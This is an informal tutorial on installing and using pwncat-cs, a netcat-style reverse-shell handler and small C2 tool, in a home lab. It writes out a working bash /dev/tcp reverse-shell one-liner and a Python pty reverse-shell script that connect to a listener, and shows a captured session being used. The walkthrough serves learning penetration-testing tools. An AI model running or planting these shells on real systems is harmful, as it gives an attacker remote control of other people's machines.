So, what is pwncat-cs ?
It's a netcat like tool, but with a twist. It's both a NetCat implementation, but also a small C2 system, much like Sliver is, so it's worth to know a bit about it. This is just a small introduction to i, i highly suggest you play around with to get to know it. But let's just jump right in. For this you'll need a Kali workstation, Python3 and pip set up.
Open up a root terminal and install python3 and python3-pip
apt install python3 python3-pipInstall pwncat-cs
python3 -m pip install pwncat-cs
Now it should start to set it up, just let it run. When you're done, launch it
pwncat-csNow, just like in Sliver, we need a listener first, to capture the reverse shells, let's have a look at the help system, and see what we got
Next, we create a listener for Linux systems, like so
listen --platform linux --host 10.0.0.xx portnumber
#listen on 10.0.0.52 port 9002
listen --platform linux --host 10.0.0.52 9002 Now, the next problem is, how do we get a system to connect to us ? There's a couple of ways to do that, on a Ubuntu or Mint box, we could open up a terminal and run this command
sh -i >& /dev/tcp/10.0.0.52/9002 0>&1Now, when the system connects back, we see the incomming session in pwncat
[15:51:38] new listener created for 10.0.0.52:9002 manager.py:957
[15:56:04] 10.0.0.21:44642: upgrading from /usr/bin/dash to /usr/bin/bash manager.py:957
10.0.0.21:44642: registered new host w/ db manager.py:957
[15:56:05] listener: 10.0.0.52:9002: linux session from 10.0.0.21:44642 established manager.py:957
(local) pwncat$
To list sessions, we simply use the sessions command.
(local) pwncat$ sessions
Active Sessions
╷ ╷ ╷ ╷ ╷
ID │ User │ Host ID │ Platform │ Type │ Address
════╪══════╪══════════════════════════════════╪══════════╪════════╪═════════════════
*0 │ nx │ 1360836f7676fe9608a6aa2a89467234 │ linux │ Socket │ 10.0.0.21:44642
╵ ╵ ╵ ╵ ╵
(local) pwncat$
Now, note the (local). It's saying we're running in out pwncat-cs environment locally, NOT the remote host. To switch we use CTRL+D, and to interact with s sessions we use session and numer, like so.
sessions 0(local) pwncat$ sessions 0
[16:00:20] targeting session-0 (10.0.0.21:44642) sessions.py:88
(local) pwncat$
To get a real shell on the emote host, use CTRL+D
[16:00:20] targeting session-0 (10.0.0.21:44642) sessions.py:88
(local) pwncat$
(remote) nx@nx-VirtualBox:/home/nx$
Notice after CTRL+D, it says (Remote), now we run in a stable shell, and can use nano, vi, mc and whatever commandline tools and commands we like. If we want to explore some of the things pwncat has to offer, we go back with CTRL+D, and play. This system is running in Python3, so it can be extended that way, but that's for another time. But, what about systems that don't support the first oneliner ?
Have a look at https://www.revshells.com/ and see what it has to offer in terms of remote shells- There's an example with a bit of python 3.
cat rev_shell.py
#!/usr/bin/python
import os,pty,socket
s=socket.socket()
s.connect(("10.0.0.52",9002))
[os.dup2(s.fileno(),f)for f in(0,1,2)]
pty.spawn("sh")Throw that into a python script, remember to substitute your own IP and port, and kick if off in a terminal :)
This system should be able to get reverse shells from Windows, but I haven't really explored that option yet, so I'll comment on that in a later piece.
Documentation : https://pwncat.readthedocs.io/en/latest/index.html and shells is here https://www.revshells.com/
Much Happy Hacking ;)